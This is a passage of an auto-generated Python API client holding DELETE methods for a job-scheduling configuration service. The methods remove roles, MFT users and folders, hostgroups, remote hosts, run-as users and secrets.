all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_authorization_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `delete_authorization_role`") # noqa: E501
collection_formats = {}
path_params = {}
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/role/{role}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_external_user(self, username, **kwargs): # noqa: E501
"""Delete an external user # noqa: E501
Delete an existing external user in MFT # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_external_user(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The name of the external user to delete (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_external_user_with_http_info(username, **kwargs) # noqa: E501
else:
(data) = self.delete_external_user_with_http_info(username, **kwargs) # noqa: E501
return data
def delete_external_user_with_http_info(self, username, **kwargs): # noqa: E501
"""Delete an external user # noqa: E501
Delete an existing external user in MFT # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_external_user_with_http_info(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The name of the external user to delete (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_external_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in params or
params['username'] is None):
raise ValueError("Missing the required parameter `username` when calling `delete_external_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in params:
path_params['username'] = params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/externaluser/{username}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_external_user_or_user_group_from_mft_folder(self, folder_name, user_or_group, **kwargs): # noqa: E501
"""Remove an external user or user group from an existing virtual folder in MFT. # noqa: E501
Remove an external user or user group from an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_external_user_or_user_group_from_mft_folder(folder_name, user_or_group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:param str user_or_group: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_external_user_or_user_group_from_mft_folder_with_http_info(folder_name, user_or_group, **kwargs) # noqa: E501
else:
(data) = self.delete_external_user_or_user_group_from_mft_folder_with_http_info(folder_name, user_or_group, **kwargs) # noqa: E501
return data
def delete_external_user_or_user_group_from_mft_folder_with_http_info(self, folder_name, user_or_group, **kwargs): # noqa: E501
"""Remove an external user or user group from an existing virtual folder in MFT. # noqa: E501
Remove an external user or user group from an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_external_user_or_user_group_from_mft_folder_with_http_info(folder_name, user_or_group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:param str user_or_group: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['folder_name', 'user_or_group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_external_user_or_user_group_from_mft_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'folder_name' is set
if ('folder_name' not in params or
params['folder_name'] is None):
raise ValueError("Missing the required parameter `folder_name` when calling `delete_external_user_or_user_group_from_mft_folder`") # noqa: E501
# verify the required parameter 'user_or_group' is set
if ('user_or_group' not in params or
params['user_or_group'] is None):
raise ValueError("Missing the required parameter `user_or_group` when calling `delete_external_user_or_user_group_from_mft_folder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'folder_name' in params:
path_params['folderName'] = params['folder_name'] # noqa: E501
if 'user_or_group' in params:
path_params['userOrGroup'] = params['user_or_group'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolder/{folderName}/user/{userOrGroup}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_host_from_group(self, server, hostgroup, host, **kwargs): # noqa: E501
"""delete an agent from a hostgroup # noqa: E501
Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_host_from_group(server, hostgroup, host, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:param str host: The agent to be deleted (required)
:return: AgentsInGroupSuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501
else:
(data) = self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501
return data
def delete_host_from_group_with_http_info(self, server, hostgroup, host, **kwargs): # noqa: E501
"""delete an agent from a hostgroup # noqa: E501
Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_host_from_group_with_http_info(server, hostgroup, host, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:param str host: The agent to be deleted (required)
:return: AgentsInGroupSuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'hostgroup', 'host'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_host_from_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_host_from_group`") # noqa: E501
# verify the required parameter 'hostgroup' is set
if ('hostgroup' not in params or
params['hostgroup'] is None):
raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_from_group`") # noqa: E501
# verify the required parameter 'host' is set
if ('host' not in params or
params['host'] is None):
raise ValueError("Missing the required parameter `host` when calling `delete_host_from_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'hostgroup' in params:
path_params['hostgroup'] = params['hostgroup'] # noqa: E501
if 'host' in params:
path_params['host'] = params['host'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroup/{hostgroup}/agent/{host}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentsInGroupSuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_host_group(self, server, hostgroup, **kwargs): # noqa: E501
"""delete host group # noqa: E501
delete host group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_host_group(server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str hostgroup: The hostgroup name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_host_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501
else:
(data) = self.delete_host_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501
return data
def delete_host_group_with_http_info(self, server, hostgroup, **kwargs): # noqa: E501
"""delete host group # noqa: E501
delete host group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_host_group_with_http_info(server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str hostgroup: The hostgroup name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'hostgroup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_host_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_host_group`") # noqa: E501
# verify the required parameter 'hostgroup' is set
if ('hostgroup' not in params or
params['hostgroup'] is None):
raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'hostgroup' in params:
path_params['hostgroup'] = params['hostgroup'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroup/{hostgroup}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_mft_folder(self, folder_name, **kwargs): # noqa: E501
"""Delete a virtual folder. # noqa: E501
Delete an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mft_folder(folder_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_mft_folder_with_http_info(folder_name, **kwargs) # noqa: E501
else:
(data) = self.delete_mft_folder_with_http_info(folder_name, **kwargs) # noqa: E501
return data
def delete_mft_folder_with_http_info(self, folder_name, **kwargs): # noqa: E501
"""Delete a virtual folder. # noqa: E501
Delete an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mft_folder_with_http_info(folder_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['folder_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_mft_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'folder_name' is set
if ('folder_name' not in params or
params['folder_name'] is None):
raise ValueError("Missing the required parameter `folder_name` when calling `delete_mft_folder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'folder_name' in params:
path_params['folderName'] = params['folder_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolder/{folderName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_mft_user_group(self, name, **kwargs): # noqa: E501
"""Delete user group. # noqa: E501
Delete user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mft_user_group(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: User group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_mft_user_group_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_mft_user_group_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_mft_user_group_with_http_info(self, name, **kwargs): # noqa: E501
"""Delete user group. # noqa: E501
Delete user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mft_user_group_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: User group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_mft_user_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_mft_user_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/usergroup/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_pgp_template(self, server, agent, template_name, **kwargs): # noqa: E501
"""Delete PGP Template # noqa: E501
Delete PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_pgp_template(server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501
return data
def delete_pgp_template_with_http_info(self, server, agent, template_name, **kwargs): # noqa: E501
"""Delete PGP Template # noqa: E501
Delete PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_pgp_template_with_http_info(server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_pgp_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_pgp_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `delete_pgp_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `delete_pgp_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_remote_host(self, server, remotehost, **kwargs): # noqa: E501
"""delete a remote host from Server # noqa: E501
Delete a remote host from a Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_remote_host(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host to delete. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_remote_host_with_http_info(server, remotehost, **kwargs) # noqa: E501
else:
(data) = self.delete_remote_host_with_http_info(server, remotehost, **kwargs) # noqa: E501
return data
def delete_remote_host_with_http_info(self, server, remotehost, **kwargs): # noqa: E501
"""delete a remote host from Server # noqa: E501
Delete a remote host from a Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_remote_host_with_http_info(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host to delete. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'remotehost'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_remote_host" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_remote_host`") # noqa: E501
# verify the required parameter 'remotehost' is set
if ('remotehost' not in params or
params['remotehost'] is None):
raise ValueError("Missing the required parameter `remotehost` when calling `delete_remote_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'remotehost' in params:
path_params['remotehost'] = params['remotehost'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/remotehost/{remotehost}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_role_from_ldap_group(self, ldapgroup, role, **kwargs): # noqa: E501
"""Delete a role from LDAP group # noqa: E501
Delete a role from LDAP group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_role_from_ldap_group(ldapgroup, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ldapgroup: Name of LDAP group (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501
else:
(data) = self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501
return data
def delete_role_from_ldap_group_with_http_info(self, ldapgroup, role, **kwargs): # noqa: E501
"""Delete a role from LDAP group # noqa: E501
Delete a role from LDAP group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_role_from_ldap_group_with_http_info(ldapgroup, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ldapgroup: Name of LDAP group (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ldapgroup', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_role_from_ldap_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ldapgroup' is set
if ('ldapgroup' not in params or
params['ldapgroup'] is None):
raise ValueError("Missing the required parameter `ldapgroup` when calling `delete_role_from_ldap_group`") # noqa: E501
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `delete_role_from_ldap_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ldapgroup' in params:
path_params['ldapgroup'] = params['ldapgroup'] # noqa: E501
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/ldap/{ldapgroup}/role/{role}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_run_as_user(self, server, agent, user, **kwargs): # noqa: E501
"""delete Run-as user # noqa: E501
Delete Run-as user from server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_run_as_user(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
return data
def delete_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501
"""delete Run-as user # noqa: E501
Delete Run-as user from server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_run_as_user_with_http_info(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_run_as_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_run_as_user`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `delete_run_as_user`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `delete_run_as_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasuser/{agent}/{user}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_secret(self, name, **kwargs): # noqa: E501
"""Delete an existing secret # noqa: E501
Delete an existing secret from the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_secret(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the secret to update (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_secret_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_secret_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_secret_with_http_info(self, name, **kwargs): # noqa: E501
"""Delete an existing secret # noqa: E501
Delete an existing secret from the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_secret_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the secret to update (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_secret" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_secret`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/secret/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
